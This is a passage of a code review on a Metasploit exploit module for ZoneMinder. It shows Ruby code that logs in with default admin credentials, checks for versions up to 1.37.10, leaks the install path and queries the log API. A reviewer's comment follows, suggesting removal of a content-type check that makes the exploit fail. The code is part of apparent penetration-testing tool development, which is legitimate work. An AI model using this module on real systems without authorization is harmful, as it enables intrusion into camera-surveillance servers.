modules/exploits/unix/webapp/zoneminder_lang_exec.rb

```diff
@@ -0,0 +1,233 @@
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
+      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
+      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET'
+    )
+    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    if res.body =~ /ZoneMinder Login/
+      csrf_magic = get_csrf_magic(res)
+      res = authenticate(csrf_magic)
+      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
+
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'GET',
+        'keep_cookies' => true
+      )
+    end
+
+    res.body.match(/v(1.\d+.\d+)/)
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
+
+    Exploit::CheckCode::Safe("Version Detected: #{version}")
+  rescue ::Rex::ConnectionError
+    return Exploit::CheckCode::Unknown('Could not connect to the web service')
+  end
+
+  def exploit
+    cookie_jar.clear
+    unless datastore['AutoCheck']
+      res = authenticate
+      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}
+    end
+
+    vprint_status('Leak installation directory path')
+    random_path = rand_text_alphanumeric(6..15)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { 'view' => random_path }
+    )
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { 'view' => 'options' }
+    )
+    csrf_magic = get_csrf_magic(res)
+    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil?
+    current_lang = res.get_html_document.at(
+      'select[@name="newConfig[ZM_LANG_DEFAULT]"]
+        option[@selected="selected"]'
+    ).text
+
+    data = 'view=request&request=log&task=query&limit=10'
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'keep_cookies' => true
+    )
+
+    unless res['content-type'] == 'application/json'
+      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
+    end
```

Comment:
I'm currently getting a content type of `"text/plain;charset=UTF-8"` when I run the updated module, which causes the exploit to fail. I don't think this check is necessary. The check below is enough to validate the response.

```suggestion
```